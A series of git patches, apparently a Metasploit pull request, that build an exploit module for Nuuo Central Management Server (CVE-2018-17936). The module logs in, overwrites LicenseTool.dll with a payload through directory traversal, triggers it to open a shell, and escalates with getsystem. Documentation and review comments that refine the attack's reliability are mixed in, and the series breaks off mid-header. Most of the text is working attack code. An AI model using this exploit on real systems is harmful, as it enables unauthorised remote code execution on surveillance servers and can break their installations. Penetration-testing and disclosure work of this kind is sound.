From 9ffff16e95a0af3cb5114a41ceb3211ad4b1b6bb Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Mon, 21 Jan 2019 17:06:10 +0700 Subject: [PATCH 01/20] Add Nuuo CMS file upload exploit --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 87 ++++++++++++++++++++ 1 file changed, 87 insertions(+) create mode 100644 modules/exploits/windows/nuuo/nuuo_cms_fu.rb diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb new file mode 100644 index 0000000000..52234f0b37 --- /dev/null +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb 
@@ -0,0 +1,87 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +# The following versions were tested: +# - 1.5.2 OK +# - 2.1.0 OK +# - 2.3.2 OK +# - 2.4.0 OK +# - 2.6.0 FAIL (vuln fixed?) +# - 2.9.0 FAIL +# - 2.10.0 FAIL + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::Remote::Nuuo + + def initialize(info={}) + super(update_info(info, + 'Name' => "Nuuo Central Management Server Authenticated Arbitrary File Upload", + 'Description' => %q{ + The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the + CMS Server. An example is below: + + COMMITCONFIG NUCM/1.0 + User-Session-No: + Filename: + FileType: + Content-Lenght: + + + The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) + characters. Therefore, this function can be abused to overwrite any files in the installation + drive of CMS Server. + + Note that this exploit will destroy the CMS installation - it will replace a key DLL! + This vulnerability is exploitable in CMS versions up to and including v2.4. + + This module will either use a provided session number (which can be guessed with an auxiliary + module) or attempt to login using a provided username and password - it will also try the + default credentials if nothing is provided. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'References' => + [ + [ 'CVE', '2018-17936' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ], + [ 'URL', 'FULLDISC_URL_TODO' ], + [ 'URL', 'GITHUB_URL_TODO' ] + ], + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Targets' => + [ + [ 'Nuuo Central Management Server <= v2.4.0', {} ], + ], + 'Privileged' => true, + 'DisclosureDate' => "Oct 11 2018", + 'DefaultTarget' => 0)) + end + + def exploit + login + + if @session == nil + fail_with(Failure::Unknown, "#{peer} - Failed to login to Nuuo CMS") + end + + print_status("#{peer} - Uploading payload...") + upload_file("LicenseTool.dll", generate_payload_dll) + print_status("#{peer} - Sleeping 15 seconds...") + sleep 15 + + print_status("#{peer} - Sending SENDLICFILE request, shell incoming!") + license_data = rand_text_alpha(rand(300) + 50) + data = send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(rand(8) + 3)}.lic", \ + "Content-Length: " + license_data.length.to_s], license_data) + # In order not to destroy the Nuuo CMS installation, we should migrate the process, kill the NCS_Server process and replace the DLL + end +end From 01e510b48f35453c7c3c17cab7f37b7d2f49d476 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 21 Jan 2019 17:30:35 +0700 Subject: [PATCH 02/20] add failure tag Co-Authored-By: pedrib --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index 52234f0b37..39abab0263 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb 
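Review bot: In `exploit`, the return value of `upload_file("LicenseTool.dll", generate_payload_dll)` is discarded, so an upload the server rejects (the header comment lists 2.6.0 and later as FAIL) still runs into the 15 s sleep and the "shell incoming!" status line, and the operator learns about the failure only from the missing session. `upload_file` is defined in the Nuuo mixin outside this file; if it reports success through its return value, gate on it, e.g. `fail_with(Failure::Unknown, "#{peer} - Upload of LicenseTool.dll was not accepted") unless upload_file("LicenseTool.dll", generate_payload_dll)`. The `data` assigned from `send_data_msg` is never read, so the assignment can go.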
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
 login

 if @session == nil
- fail_with(Failure::Unknown, "#{peer} - Failed to login to Nuuo CMS")
+ fail_with(Failure::NoAccess, "#{peer} - Failed to login to Nuuo CMS")
 end

 print_status("#{peer} - Uploading payload...")

From 88c74fcd40c7caddff5ca69436bdd52d929ba334 Mon Sep 17 00:00:00 2001
From: bcoles
Date: Mon, 21 Jan 2019 17:30:54 +0700
Subject: [PATCH 03/20] add https for link

Co-Authored-By: pedrib
---
 modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
index 39abab0263..39f58e9642 100644
--- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
+++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

From 5b699768fb4ed59631a02b15247b56ce0406b3d8 Mon Sep 17 00:00:00 2001
From: bcoles
Date: Mon, 21 Jan 2019 17:31:08 +0700
Subject: [PATCH 04/20] Add correct rand call

Co-Authored-By: pedrib
---
 modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
index 39f58e9642..74dd1cf09d 100644
--- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
+++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote sleep 15 print_status("#{peer} - Sending SENDLICFILE request, shell incoming!") - license_data = rand_text_alpha(rand(300) + 50) + license_data = rand_text_alpha(50..350) data = send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(rand(8) + 3)}.lic", \ "Content-Length: " + license_data.length.to_s], license_data) # In order not to destroy the Nuuo CMS installation, we should migrate the process, kill the NCS_Server process and replace the DLL From f8de99422db44555603255dff0748db2f9b28cf4 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 21 Jan 2019 17:31:23 +0700 Subject: [PATCH 05/20] Add correct rand call Co-Authored-By: pedrib --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index 74dd1cf09d..9aceca8837 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote print_status("#{peer} - Sending SENDLICFILE request, shell incoming!") license_data = rand_text_alpha(50..350) - data = send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(rand(8) + 3)}.lic", \ + data = send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", \ "Content-Length: " + license_data.length.to_s], license_data) # In order not to destroy the Nuuo CMS installation, we should migrate the process, kill the NCS_Server process and replace the DLL end From 15d4ca9070a36aef12150352eeb015a16deeff84 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Mon, 21 Jan 2019 17:33:58 +0700 Subject: [PATCH 06/20] Add CMS link and manual ranking --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) 
diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index 9aceca8837..85d053824c 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -13,7 +13,7 @@ # - 2.10.0 FAIL class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = ManualRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::Nuuo @@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote [ 'CVE', '2018-17936' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ], [ 'URL', 'FULLDISC_URL_TODO' ], - [ 'URL', 'GITHUB_URL_TODO' ] + [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ] ], 'Platform' => 'win', 'Arch' => ARCH_X86, @@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote print_status("#{peer} - Sending SENDLICFILE request, shell incoming!") license_data = rand_text_alpha(50..350) - data = send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", \ + data = send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", "Content-Length: " + license_data.length.to_s], license_data) # In order not to destroy the Nuuo CMS installation, we should migrate the process, kill the NCS_Server process and replace the DLL end From 272121911dc7c22c48057ca0e6068b85f0148a3f Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Mon, 21 Jan 2019 17:39:47 +0700 Subject: [PATCH 07/20] Add doc file for fu exploit --- .../exploit/windows/nuuo/nuuo_cms_fu.md | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md diff --git a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md new file mode 100644 index 0000000000..2fc7b2a7e0 --- /dev/null +++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md 
@@ -0,0 +1,21 @@ +# Nuuo CMS Authenticated Arbitrary File Upload + +The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the CMS Server. An example is below: + +COMMITCONFIG NUCM/1.0 +User-Session-No: +Filename: +FileType: +Content-Lenght: + + +The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to overwrite any files in the installation drive of CMS Server. + +Note that this exploit will destroy the CMS installation - it will replace a key DLL! +This vulnerability is exploitable in CMS versions up to and including v2.4. + +This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. + +## References +https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02 +https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt From 100fd7b80a0fa0a0b10a41d9170abcd9106ac57a Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Mon, 21 Jan 2019 17:40:50 +0700 Subject: [PATCH 08/20] Make description shorter --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 19 +------------------ 1 file changed, 1 insertion(+), 18 deletions(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index 85d053824c..b67abc253d 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -3,15 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -# The following versions were tested: -# - 1.5.2 OK -# - 2.1.0 OK -# - 2.3.2 OK -# - 2.4.0 OK -# - 2.6.0 FAIL (vuln fixed?) -# - 2.9.0 FAIL -# - 2.10.0 FAIL - class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking 
@@ -23,15 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "Nuuo Central Management Server Authenticated Arbitrary File Upload", 'Description' => %q{ The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the - CMS Server. An example is below: - - COMMITCONFIG NUCM/1.0 - User-Session-No: - Filename: - FileType: - Content-Lenght: - - + CMS Server. The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to overwrite any files in the installation drive of CMS Server. From 66dd2d5b8b280cc92ba943583ac45b3f8565bab9 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Mon, 21 Jan 2019 17:41:07 +0700 Subject: [PATCH 09/20] Update nuuo_cms_fu.md --- .../modules/exploit/windows/nuuo/nuuo_cms_fu.md | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md index 2fc7b2a7e0..2591952713 100644 --- a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md +++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md @@ -16,6 +16,16 @@ This vulnerability is exploitable in CMS versions up to and including v2.4. This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. + +# The following versions were tested: +# - 1.5.2 OK +# - 2.1.0 OK +# - 2.3.2 OK +# - 2.4.0 OK +# - 2.6.0 FAIL (vuln fixed?) +# - 2.9.0 FAIL +# - 2.10.0 FAIL + ## References https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02 https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt From 70b9110840c5b8cffe305f46ab9cc2335b68ef62 Mon Sep 17 00:00:00 2001 
From: Pedro Ribeiro Date: Mon, 21 Jan 2019 18:13:23 +0700 Subject: [PATCH 10/20] Update nuuo_cms_fu.md --- .../modules/exploit/windows/nuuo/nuuo_cms_fu.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md index 2591952713..0c6bf9c686 100644 --- a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md +++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md @@ -17,14 +17,14 @@ This vulnerability is exploitable in CMS versions up to and including v2.4. This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. -# The following versions were tested: -# - 1.5.2 OK -# - 2.1.0 OK -# - 2.3.2 OK -# - 2.4.0 OK -# - 2.6.0 FAIL (vuln fixed?) -# - 2.9.0 FAIL -# - 2.10.0 FAIL +## The following versions were tested: + - 1.5.2 OK + - 2.1.0 OK + - 2.3.2 OK + - 2.4.0 OK + - 2.6.0 FAIL (vuln fixed?) + - 2.9.0 FAIL + - 2.10.0 FAIL ## References https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02 From 9a068e92215ce2fcf4a59bd2227425ad89c3498c Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Tue, 22 Jan 2019 11:57:54 +0700 Subject: [PATCH 11/20] Repair CMS installation and use getsystem --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 38 +++++++++++++++++--- 1 file changed, 34 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index b67abc253d..f3f58eea30 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -4,7 +4,7 @@ ## class MetasploitModule < Msf::Exploit::Remote - Rank = ManualRanking + Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::Nuuo 
@@ -19,7 +19,6 @@ class MetasploitModule < Msf::Exploit::Remote characters. Therefore, this function can be abused to overwrite any files in the installation drive of CMS Server. - Note that this exploit will destroy the CMS installation - it will replace a key DLL! This vulnerability is exploitable in CMS versions up to and including v2.4. This module will either use a provided session number (which can be guessed with an auxiliary @@ -49,6 +48,30 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultTarget' => 0)) end + def on_new_session(client) + if client.type == "meterpreter" + print_warning("#{peer} - Please wait a bit while we clean up") + client.sys.process.get_processes().each do |proc| + if proc['name'] == "NCS_Server.exe" + client.sys.process.kill(proc['pid']) + sleep 5 + client.shell_command_token("move /y #{@dll} LicenseTool.dll") + client.sys.process.execute("NCS_Server.exe") + print_good("#{peer} - Successfully restored LicenseTool.dll!") + end + end + + # elevate privs to system (we're already Admin anyway), and we're done! + client.run_cmd("getsystem") + print_good("#{peer} - We should have SYSTEM now, enjoy your shell!") + else + print_error("#{peer} - You are not using meterpreter, so we are unable to restore LicenseTool.dll") + print_error("#{peer} - To restore it, kill the NCS_Server.exe process and copy \\#{@dll} to \\LicenseTool.dll") + print_error("#{peer} - ... otherwise the Nuuo CMS installation will be nuked!") + print_good("#{peer} - Anyway, enjoy your shell!") + end + end + def exploit login 
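Review bot: In the new `on_new_session`, LicenseTool.dll is restored only inside the `if proc['name'] == "NCS_Server.exe"` branch; when no such process is listed the loop finishes silently, `getsystem` runs and "enjoy your shell" is printed even though the original DLL is still overwritten. Record whether the branch ran, e.g. `restored = false` before the loop, `restored = true` after the `print_good`, and `print_error("#{peer} - NCS_Server.exe not found, LicenseTool.dll was NOT restored") unless restored` after it. The `move /y #{@dll} LicenseTool.dll` command uses paths relative to the session's working directory, while the manual instructions in the `else` branch refer to `\\#{@dll}` and `\\LicenseTool.dll` at the drive root, so the two presumably disagree; confirm where the mixin's upload writes and use the same absolute path in both. The block parameter `proc` also shadows `Kernel#proc`; `process` avoids that.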
@@ -56,15 +79,22 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Failed to login to Nuuo CMS") end + # Download and upload a backup of LicenseTool.dll, so that we can restore it at post + # and not nuke the CMS installation. + @dll = rand_text_alpha(12) + print_status("#{peer} - Backing up LicenseTool.dll to #{@dll}") + dll_data = download_file("LicenseTool.dll") + upload_file(@dll, dll_data) + print_status("#{peer} - Uploading payload...") upload_file("LicenseTool.dll", generate_payload_dll) + print_status("#{peer} - Sleeping 15 seconds...") sleep 15 print_status("#{peer} - Sending SENDLICFILE request, shell incoming!") license_data = rand_text_alpha(50..350) - data = send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", + send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", "Content-Length: " + license_data.length.to_s], license_data) - # In order not to destroy the Nuuo CMS installation, we should migrate the process, kill the NCS_Server process and replace the DLL end end From af9d7727adc3fc76801828536fc2f5a12452b84d Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Tue, 22 Jan 2019 11:59:57 +0700 Subject: [PATCH 12/20] Remove warning about destroying install --- documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md | 1 - 1 file changed, 1 deletion(-) diff --git a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md index 0c6bf9c686..9ef8afed95 100644 --- a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md +++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md 
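Review bot: `dll_data = download_file("LicenseTool.dll")` is used unchecked, so if the download fails and yields nil or an empty string, `upload_file(@dll, dll_data)` writes an empty backup and the later restore in `on_new_session` replaces LicenseTool.dll with that empty file — the corruption the backup is meant to prevent. Abort before the original is touched: `fail_with(Failure::UnexpectedReply, "#{peer} - Could not back up LicenseTool.dll, refusing to overwrite it") if dll_data.nil? || dll_data.empty?`. `download_file` is defined in the Nuuo mixin outside this file, so confirm what it returns on failure and adjust the check to match.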
@@ -11,7 +11,6 @@ Content-Lenght: The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to overwrite any files in the installation drive of CMS Server. -Note that this exploit will destroy the CMS installation - it will replace a key DLL! This vulnerability is exploitable in CMS versions up to and including v2.4. This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. From 0685ebed76c8df88bae3212a92672cb99f479a5a Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Tue, 22 Jan 2019 12:08:41 +0700 Subject: [PATCH 13/20] Remove peer as that is not needed --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 24 ++++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index f3f58eea30..e359ed7a63 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb 
@@ -50,25 +50,25 @@ class MetasploitModule < Msf::Exploit::Remote def on_new_session(client) if client.type == "meterpreter" - print_warning("#{peer} - Please wait a bit while we clean up") + print_warning("Please wait a bit while we clean up") client.sys.process.get_processes().each do |proc| if proc['name'] == "NCS_Server.exe" client.sys.process.kill(proc['pid']) sleep 5 client.shell_command_token("move /y #{@dll} LicenseTool.dll") client.sys.process.execute("NCS_Server.exe") - print_good("#{peer} - Successfully restored LicenseTool.dll!") + print_good("Successfully restored LicenseTool.dll!") end end # elevate privs to system (we're already Admin anyway), and we're done! client.run_cmd("getsystem") - print_good("#{peer} - We should have SYSTEM now, enjoy your shell!") + print_good("We should have SYSTEM now, enjoy your shell!") else - print_error("#{peer} - You are not using meterpreter, so we are unable to restore LicenseTool.dll") - print_error("#{peer} - To restore it, kill the NCS_Server.exe process and copy \\#{@dll} to \\LicenseTool.dll") - print_error("#{peer} - ... otherwise the Nuuo CMS installation will be nuked!") - print_good("#{peer} - Anyway, enjoy your shell!") + print_error("You are not using meterpreter, so we are unable to restore LicenseTool.dll") + print_error("To restore it, kill the NCS_Server.exe process and copy \\#{@dll} to \\LicenseTool.dll") + print_error("... otherwise the Nuuo CMS installation will be nuked!") + print_good("Anyway, enjoy your shell!") end end 
@@ -76,23 +76,23 @@ class MetasploitModule < Msf::Exploit::Remote login if @session == nil - fail_with(Failure::NoAccess, "#{peer} - Failed to login to Nuuo CMS") + fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS") end # Download and upload a backup of LicenseTool.dll, so that we can restore it at post # and not nuke the CMS installation. @dll = rand_text_alpha(12) - print_status("#{peer} - Backing up LicenseTool.dll to #{@dll}") + print_status("Backing up LicenseTool.dll to #{@dll}") dll_data = download_file("LicenseTool.dll") upload_file(@dll, dll_data) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") upload_file("LicenseTool.dll", generate_payload_dll) - print_status("#{peer} - Sleeping 15 seconds...") + print_status("Sleeping 15 seconds...") sleep 15 - print_status("#{peer} - Sending SENDLICFILE request, shell incoming!") + print_status("Sending SENDLICFILE request, shell incoming!") license_data = rand_text_alpha(50..350) send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", "Content-Length: " + license_data.length.to_s], license_data) From 4e1d79ac4be1d4ea953b54dbb6b8622b9122e4fe Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Tue, 22 Jan 2019 12:45:47 +0700 Subject: [PATCH 14/20] Update nuuo_cms_fu.rb --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 26 ++++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index e359ed7a63..951776d171 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "Nuuo Central Management Server Authenticated Arbitrary File Upload", 'Description' => %q{ The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the - CMS Server. + CMS Server. The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to overwrite any files in the installation drive of CMS Server. @@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote def on_new_session(client) if client.type == "meterpreter" - print_warning("Please wait a bit while we clean up") + print_warning("Please wait a bit while we clean up") client.sys.process.get_processes().each do |proc| if proc['name'] == "NCS_Server.exe" client.sys.process.kill(proc['pid']) @@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote print_good("Successfully restored LicenseTool.dll!") end end - + # elevate privs to system (we're already Admin anyway), and we're done! client.run_cmd("getsystem") print_good("We should have SYSTEM now, enjoy your shell!") 
@@ -71,30 +71,30 @@ class MetasploitModule < Msf::Exploit::Remote print_good("Anyway, enjoy your shell!") end end - - def exploit - login - if @session == nil + def exploit + nucs_login + + if @nucs_session == nil fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS") end - # Download and upload a backup of LicenseTool.dll, so that we can restore it at post + # Download and upload a backup of LicenseTool.dll, so that we can restore it at post # and not nuke the CMS installation. @dll = rand_text_alpha(12) print_status("Backing up LicenseTool.dll to #{@dll}") - dll_data = download_file("LicenseTool.dll") - upload_file(@dll, dll_data) - + dll_data = nucs_download_file("LicenseTool.dll") + nucs_upload_file(@dll, dll_data) + print_status("Uploading payload...") - upload_file("LicenseTool.dll", generate_payload_dll) + nucs_upload_file("LicenseTool.dll", generate_payload_dll) print_status("Sleeping 15 seconds...") sleep 15 print_status("Sending SENDLICFILE request, shell incoming!") license_data = rand_text_alpha(50..350) - send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", + nucs_send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", "Content-Length: " + license_data.length.to_s], license_data) end end From fbde697e3f620f744116a64148ab331d5321c625 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Tue, 22 Jan 2019 18:57:02 +0700 Subject: [PATCH 15/20] Update nuuo_cms_fu.rb --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index 951776d171..b85d01b9c0 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -4,7 +4,7 @@ ## class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = ManualRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::Nuuo 
From 2bf663cf7d336a8d2b6cbd0c87c15c3be8b3b43a Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro
Date: Thu, 24 Jan 2019 21:59:45 +0700
Subject: [PATCH 16/20] Add full disclosure URL

---
 modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
index b85d01b9c0..91f8922d15 100644
--- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
+++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
 [
 [ 'CVE', '2018-17936' ],
 [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
- [ 'URL', 'FULLDISC_URL_TODO' ],
+ [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
 [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]
 ],
 'Platform' => 'win',

From 9070435603e4a2d8f9d6500ebaec12dfd7b2dc9d Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro
Date: Wed, 30 Jan 2019 21:32:33 +0700
Subject: [PATCH 17/20] Change to support the new nuuo lib

---
 modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
index 91f8922d15..c9b992198f 100644
--- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
+++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote

 print_status("Sending SENDLICFILE request, shell incoming!")
 license_data = rand_text_alpha(50..350)
- nucs_send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
+ nucs_send_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
 "Content-Length: " + license_data.length.to_s], license_data)
 end
 end

From 2b714108075d178f54444e66ece8736a46314162 Mon Sep 17 00:00:00 2001
